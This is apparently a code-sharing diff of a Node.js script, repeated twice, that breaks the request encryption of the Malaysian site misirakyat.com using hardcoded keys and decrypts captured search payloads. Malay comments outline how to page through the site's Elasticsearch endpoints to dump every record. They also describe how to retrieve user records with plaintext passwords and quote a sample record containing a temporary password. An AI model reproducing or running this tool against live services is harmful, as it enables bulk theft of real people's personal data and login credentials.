RamadhanAmizudin · July 4, 2023 16:02 · ungkunazmi · Jul 5, 2023 · aimanhey · Jul 5, 2023
diff --git a/misirakyat.js b/misirakyat.js
 // Sambung dari: https://www.facebook.com/100000118263227/posts/pfbid08EseyuLaiE8kK82k4neHDgDwEJ5wHwJMb99T8jKF8dTSNpfnZs2bjk89KH8cCSFfl/?d=w&mibextid=qC1gEa
 
 const crypto = require('crypto');
 const print = console.log

 function getTimestamp(data) {
 	let key = crypto.pbkdf2Sync('misirakyat','misirakyat', 7, 32, "md5");
 	let iv = crypto.pbkdf2Sync('po9','misirakyat', 7, 16, "md5");
 	let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv);
 	let decrypted = Buffer.concat([
        decrypter.update(data, 'base64'),
        decrypter.final()
    ]).toString('utf8');
    return decrypted.split('_')[0]
 }

 function getRandomInt(data) {
 	let key = crypto.pbkdf2Sync('misirakyat','misirakyat', 7, 32, "md5");
 	let iv = crypto.pbkdf2Sync('fl1','misirakyat', 7, 16, "md5");
 	let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv);
 	let decrypted = Buffer.concat([
        decrypter.update(data, 'base64'),
        decrypter.final()
    ]).toString('utf8');
    return decrypted.split('_')[0]
 }

 function decryptRequest(input) {
 	let data = JSON.parse(input)
 	let key = crypto.pbkdf2Sync('misirakyat' + getTimestamp(data['y']),'misirakyat', 7, 32, "md5");
 	let iv = crypto.pbkdf2Sync(getRandomInt(data['x']),'misirakyat', 7, 16, "md5");
 	let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv);
    dec = decrypter.update(data['z'], 'base64'),
    dec += decrypter.final()
    return dec
 }

 function encryptRequest(z, y, x) {
 	// :)
 }

 // msearch request
 print(decryptRequest('{"z":"t1kE4zKRMNA9+SKDBBvqRQnwMXLH+EgOD02oUzdKgqwpWuHFpo/xD1Vxyy+vtvBYVNWj5mP3XkRw1vqfzn2SJv7z8O/fqY84hNghBVMf6Cjuvf0YdZanOkdC9WMhtPuJqp3hdSn56F+jnDy9Suff/pNGnpyjHMO+35xy6JxJrGzg0SKyt1mVnUR6Nk8pLTUZ3/a94becbAJ6OcHXYued5Gs2FOQ3zEqIrraUQ/F/BoQkYfYRDfg3M/uYzgu5EhFXuHSphisewfNFSdBnDCF6w7UVMQA6zmfJBBkWML0p8JyMTjLZJ0iF6EJGh8ehA/ZoxU9azejH0fBuNbYhQ8FVuUyYVfptahTC73GoQvV3JlSSDW8MKqZkzZxWyKo5MsWd","y":"rE/PfBAMwbYFaXxgDRBdhA==","x":"Er97OdzkLnHQTH6wg/ZgSW3YNiH2RarYNs9CX9NbQic="}'))

 // mget request
 print(decryptRequest('{"z":"io58PiyPruXYV4KoQm+mI2xj9fYQyAcblVYcM711Di1jZlg4+Yy9UxvBQT8ix9YOhSZR8NnLxLUgDFF99cTtAJm1o7V9wRqNYqwFAQRwN8ZoUf/Olmqk3DM7BQybq2qeK4qyYrbqdOzJ5urIzkkviulz5kkGAGcMlL94OL9eW6gdlXCcVofvy68U8xYZjOY8Z+AORigoUnhAbEbX3iBZUvMC/OnvatHO2UAszbSm7zNdvrtCGe8QwOCYKTEbdWD6a+hT6fxmSmn7DR+6qtndQdiX8wcfe76cW1fRc8B6IqA927ctSLmtxQtUOOW0tC4SR6lClgyi088zm3ytZP1SWfgZPzne+n7lQ+qkGOag7Vrvd0gYUBDmOCvpSKUz54nBtR0/Fo0dEwUhtwSufXBM4B2KajQovF4URjm2hssORsQiV0uH7HgOX1xAGp0AkD/Os3eDfgrHycM5ep1/LRbjyps5CX5dnEdYwWH7XHtOZrOiPeURpB7PZvuFN15sfo64g69zANxTu4bbhDNnh/iqGhhq38D/fRWRrhA2A9SVJWK7sqF16BoxAyxFfUqx8kJbdhs6ysTz7o08NiqdfwPEZYg1MBiLVa87fembsa16VOQQImqVnqOnYdFQepEP2kYLGqMb7WHtXEfGVs8OqbOja4WDD8CWylxAn/HAZPetD8RoOB8GaeU9CJjWcHXjcF5AvkwZodyB+BKQ9DmMa/DZuGknEren5UPdU7H35/9fnmIYo5blklCphlA6BNdBmRHmFKpI8p6Rcgax++qJm0z3gciTNNqYNPYKKze+jksYxCunCP3JGttOJCWNcB1Xz3lwA6d6SEQdVfg5epaJnfVNSaD18zhGvo71PhX7Z/VSL1Geyfb8RayMve1n/PvnywrrnCJYgwnf6baypK//hLyyi641mpNRowwKJKf07VdxhWjP61DriIM0Mzy4Hxrn4Dv4NVK5lGyouxSGUJC4ksvD5cjDBdPlGC/YbquWI3qgaBforFs4VKwF5a1cNfZuB2zv","y":"vmFiMliJNzZGpyv7eKGYLQ==","x":"EtcdfBhx6CngqiJtgXqEREVk8iao5xyet7wQucqEQIo="}'))


 // macam mana nak dump semua data?
 // 
 // logic:
 // response = request misirakyat.com/elasticsearch/msearch [n=10000,start=0]
 // while response.at_end != false
 //		reponse = request misirakyat.com/elasticsearch/msearch [n=10000,start=++]
 //
 // kalau rajin boleh amik user data with password - spoiler: plain text :)
 // response = request misirakyat.com/elasticsearch/mget [ids=[xx,yy,zz..]]
 // Contoh response:
 // _source":{"password_sementara_text":"makabu123","nama_text":"Zaxxxx","Created Date":1683443778932,"kawasan_text":"SEMANGGOL","authentication
 //
 // 
 // Yang benar 
 // rempah (@rempahrz)
 // 2023 r0xnkekw
	// Sambung dari: https://www.facebook.com/100000118263227/posts/pfbid08EseyuLaiE8kK82k4neHDgDwEJ5wHwJMb99T8jKF8dTSNpfnZs2bjk89KH8cCSFfl/?d=w&mibextid=qC1gEa

	const crypto = require('crypto');
	const print = console.log

	function getTimestamp(data) {
	let key = crypto.pbkdf2Sync('misirakyat','misirakyat', 7, 32, "md5");
	let iv = crypto.pbkdf2Sync('po9','misirakyat', 7, 16, "md5");
	let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv);
	let decrypted = Buffer.concat([
	decrypter.update(data, 'base64'),
	decrypter.final()
	]).toString('utf8');
	return decrypted.split('_')[0]
	}

	function getRandomInt(data) {
	let key = crypto.pbkdf2Sync('misirakyat','misirakyat', 7, 32, "md5");
	let iv = crypto.pbkdf2Sync('fl1','misirakyat', 7, 16, "md5");
	let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv);
	let decrypted = Buffer.concat([
	decrypter.update(data, 'base64'),
	decrypter.final()
	]).toString('utf8');
	return decrypted.split('_')[0]
	}

	function decryptRequest(input) {
	let data = JSON.parse(input)
	let key = crypto.pbkdf2Sync('misirakyat' + getTimestamp(data['y']),'misirakyat', 7, 32, "md5");
	let iv = crypto.pbkdf2Sync(getRandomInt(data['x']),'misirakyat', 7, 16, "md5");
	let decrypter = crypto.createDecipheriv("aes-256-cbc", key, iv);
	dec = decrypter.update(data['z'], 'base64'),
	dec += decrypter.final()
	return dec
	}

	function encryptRequest(z, y, x) {
	// :)
	}

	// msearch request
	print(decryptRequest('{"z":"t1kE4zKRMNA9+SKDBBvqRQnwMXLH+EgOD02oUzdKgqwpWuHFpo/xD1Vxyy+vtvBYVNWj5mP3XkRw1vqfzn2SJv7z8O/fqY84hNghBVMf6Cjuvf0YdZanOkdC9WMhtPuJqp3hdSn56F+jnDy9Suff/pNGnpyjHMO+35xy6JxJrGzg0SKyt1mVnUR6Nk8pLTUZ3/a94becbAJ6OcHXYued5Gs2FOQ3zEqIrraUQ/F/BoQkYfYRDfg3M/uYzgu5EhFXuHSphisewfNFSdBnDCF6w7UVMQA6zmfJBBkWML0p8JyMTjLZJ0iF6EJGh8ehA/ZoxU9azejH0fBuNbYhQ8FVuUyYVfptahTC73GoQvV3JlSSDW8MKqZkzZxWyKo5MsWd","y":"rE/PfBAMwbYFaXxgDRBdhA==","x":"Er97OdzkLnHQTH6wg/ZgSW3YNiH2RarYNs9CX9NbQic="}'))

	// mget request
	print(decryptRequest('{"z":"io58PiyPruXYV4KoQm+mI2xj9fYQyAcblVYcM711Di1jZlg4+Yy9UxvBQT8ix9YOhSZR8NnLxLUgDFF99cTtAJm1o7V9wRqNYqwFAQRwN8ZoUf/Olmqk3DM7BQybq2qeK4qyYrbqdOzJ5urIzkkviulz5kkGAGcMlL94OL9eW6gdlXCcVofvy68U8xYZjOY8Z+AORigoUnhAbEbX3iBZUvMC/OnvatHO2UAszbSm7zNdvrtCGe8QwOCYKTEbdWD6a+hT6fxmSmn7DR+6qtndQdiX8wcfe76cW1fRc8B6IqA927ctSLmtxQtUOOW0tC4SR6lClgyi088zm3ytZP1SWfgZPzne+n7lQ+qkGOag7Vrvd0gYUBDmOCvpSKUz54nBtR0/Fo0dEwUhtwSufXBM4B2KajQovF4URjm2hssORsQiV0uH7HgOX1xAGp0AkD/Os3eDfgrHycM5ep1/LRbjyps5CX5dnEdYwWH7XHtOZrOiPeURpB7PZvuFN15sfo64g69zANxTu4bbhDNnh/iqGhhq38D/fRWRrhA2A9SVJWK7sqF16BoxAyxFfUqx8kJbdhs6ysTz7o08NiqdfwPEZYg1MBiLVa87fembsa16VOQQImqVnqOnYdFQepEP2kYLGqMb7WHtXEfGVs8OqbOja4WDD8CWylxAn/HAZPetD8RoOB8GaeU9CJjWcHXjcF5AvkwZodyB+BKQ9DmMa/DZuGknEren5UPdU7H35/9fnmIYo5blklCphlA6BNdBmRHmFKpI8p6Rcgax++qJm0z3gciTNNqYNPYKKze+jksYxCunCP3JGttOJCWNcB1Xz3lwA6d6SEQdVfg5epaJnfVNSaD18zhGvo71PhX7Z/VSL1Geyfb8RayMve1n/PvnywrrnCJYgwnf6baypK//hLyyi641mpNRowwKJKf07VdxhWjP61DriIM0Mzy4Hxrn4Dv4NVK5lGyouxSGUJC4ksvD5cjDBdPlGC/YbquWI3qgaBforFs4VKwF5a1cNfZuB2zv","y":"vmFiMliJNzZGpyv7eKGYLQ==","x":"EtcdfBhx6CngqiJtgXqEREVk8iao5xyet7wQucqEQIo="}'))


	// macam mana nak dump semua data?
	//
	// logic:
	// response = request misirakyat.com/elasticsearch/msearch [n=10000,start=0]
	// while response.at_end != false
	// reponse = request misirakyat.com/elasticsearch/msearch [n=10000,start=++]
	//
	// kalau rajin boleh amik user data with password - spoiler: plain text :)
	// response = request misirakyat.com/elasticsearch/mget [ids=[xx,yy,zz..]]
	// Contoh response:
	// _source":{"password_sementara_text":"makabu123","nama_text":"Zaxxxx","Created Date":1683443778932,"kawasan_text":"SEMANGGOL","authentication
	//
	//
	// Yang benar
	// rempah (@rempahrz)
	// 2023 r0xnkekw